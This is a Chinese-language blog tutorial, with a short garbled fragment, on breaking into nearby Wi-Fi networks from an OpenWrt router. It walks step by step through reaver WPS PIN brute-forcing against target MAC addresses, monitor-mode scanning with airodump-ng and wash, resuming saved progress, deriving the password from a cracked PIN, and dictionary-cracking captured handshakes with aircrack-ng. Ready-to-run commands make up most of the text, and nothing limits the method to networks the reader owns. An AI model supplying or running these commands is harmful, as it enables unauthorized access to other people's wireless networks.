首先必须你的路由器可以挂网卡而且网卡支持PIN
这里不讲软件安装方法,下面提示一下。
在系统-软件包 更新列表 安装reaver.ipk aircrack-ng.ipk,后面pin的时候提示缺什么就安装什么。
安装reaver aircrack-ng screen mdk3等软件,注意安装时要连接上网络
输入opkg update回车
输入opkg install reaver aircrack-ng screen mdk3 回车
输入opkg update回车
输入opkg install reaver aircrack-ng screen mdk3 回车
分别输入上面这两条命令就可以了。一定要连上网络。等下就会自动联网安装好。
附:mdk3是攻击用的,screen是开启后台pin用的,aircrack是开启扫描模式用的,reaver才是pin的
下面开始进入主题
路由器插上网卡,启动路由器,进入路由器里点击网络——无线查看有没有挂载的网卡如下图
打开软件putty.exe
输入你的路由器地址——点击打开
会提示下面的(如图),不理他
输入路由器的用户名然后回车
输入路由器的密码然后回车
注意,此时有的可能看不到输入的内容,没关系,你输入后直接回车就可以了
进来后如下图,然后输入命令screen 回车即按一下键盘的Enter键,这样就进入了后台模式了,记住这是很重要的一步。
再输入命令 ifconfig -a 回车,意思是查看可用网卡如下图:
然后输入 ifconfig wlan1 up 加载 wlan1 网卡 (查对MAC wlan1是我挂载的网卡)
再输入 ifconfig wlan1 down 关闭 wlan1 网卡 如下图,这两个命令没什么变化
输入 airmon-ng start wlan1 开启监听模式 激活到 mon0端口如下图9
注意只有显示芯片了的才能PIN。
输入 airodump-ng mon0 扫描 SSID 信号列表输入回车后开始扫描网络
扫描一会后按键盘上的CTRL+C 停止扫描,如果你不停止他会一直扫描。
谨记当你的网卡处在使用状态的时候你只能扫描到你同信道的WIFI
停止后找到你要PIN的网络注意看路由器可以PIN的方法是54e后面有个 . 的就可以PIN如下图
然后输入 reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -S -vv -c 1 (mon0代表网卡端口名 xx:xx:xx:xx:xx:xx是路由器的物理地址 -S是大写的不是小写 -c 代表指定频道号,-c后面的1 是频道号 每个信号可能不一样 这样reaver就不用在去扫描频道了)
例子reaver -i mon0 -b 0C:72:2C:E2:EA:02 -a -S -vv -c 1
输入后等一会就开始pin了
要停止按键盘上的CTRL+C
附:命令 wash -i mon0 -C 这个可用来检测周围无线支持wps 可PIN的路由
按ctrl+a+d 键 退出当前screen即可以关闭putty关闭电脑后台跑PIN了
下次打开电脑我们可以打开 putty.exe 软件,在里面输入 screen -r 命令来恢复screen
PIN的记录保存在ROOT这个目录下以“mac.wpc”命名,“mac”是指你需要pin的路由mac名称0
下面是离开后再次进入进程的命令screen –ls x
查看PJ进度 恢复PJ窗口的命令是 screen -r
其他相关内容,需要用到软件WinSCP
可能部分路由信号差,或者出现pin死的状态,我们可以按ctrl+C 保存进度。具体方法:
打开Winscp软件,点击“新建”。如下图:
然后输入路由器登陆地址,用户名,密码,点击登陆
登陆后如下图:
如下图操作打开putty软件
得到如下图:
这里也可以PIN,安装软件等,步骤跟上面的一样,就是上面的软件。
按ctrl+C 保存进度
, 
- O# g3 B$ a$ {+ s7 j+ E) k
- O# g3 B$ a$ {+ s7 j+ E) k
然后我们在路由器的 ROOT文件夹会找到保存下来的 WPC文件
& G
有时候也会出现无法保存的情况,没关系记下跑出来的前四位(假如是5596),在root文件夹新建一个wpc文件,把前四位出入进去,这样下次也可以接着pin。
知道pin码,输入下面命令也可以直接出密码
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -p 10927081(10927081为你PJ的pin码)
指定位置接着pin方法
我们在WinSCP 软件里右框中打开 root 根目录 新建一个名为 1.wpc 的文件里面可设置PIN 的开始位置 可以继续接着pin或者指定位置接着pin了。
reaver -i mon0 -b C5:A8:3F:EF:1F:A7 -a -S -vv -c 1 -s 1.wpc
reaver -i mon0 -b C5:A8:3F:EF:1F:A7 -a -S -vv -c 1 -s 1.wpc
(mon0 代表网卡端口名 -S是大写的不是小写 -c 代表指定频道号,-c后面的1 是频道号 每个信号 可能不一样 这样reaver就不用在去扫描频道了,-s 后面跟的就是指定文件名。),
其实刷了OPenwrt的路由是可以用来抓包的,插上U盘,抓到的跑会被保存在U盘上面。
命令也不是很复杂,不过个人觉得,好像用路由抓包用处不大。
抓到包之后,把字典也扔到U盘里,就可以跑包了,试过一次,
好像是100多还是200的速度,只能纯粹感受下路由跑包而已。
给大家一个跑包的命令:
aircrack-ng -w /mnt/sda1/password.TXT -b mac地址 /mnt/sda1/mac地址.cap
(sda1是你的U盘挂载点,password.TXT就是你u盘上的字典,mac地址.cap是你的握手包)
个人觉得不用开电脑了,全手机端操作还是很爽的,你有没有那种开电脑跑pin就会总想去看下电脑的pj进度,用路由就没这个问题了,省事。省心。。如果大家对手机端感兴趣,可以去搜索各自平台的SSH控制软件!
技巧:解决有些网卡PIN时一直是重码问题
按ctrl+c 键暂停,然后再输入ifconfig wlan0 up命令,注意“wlan0 ”是你之前加载 wlan0的网卡。
有的网卡一pin就重启路由器,解决方法就是关闭网卡
没有评论:
发表评论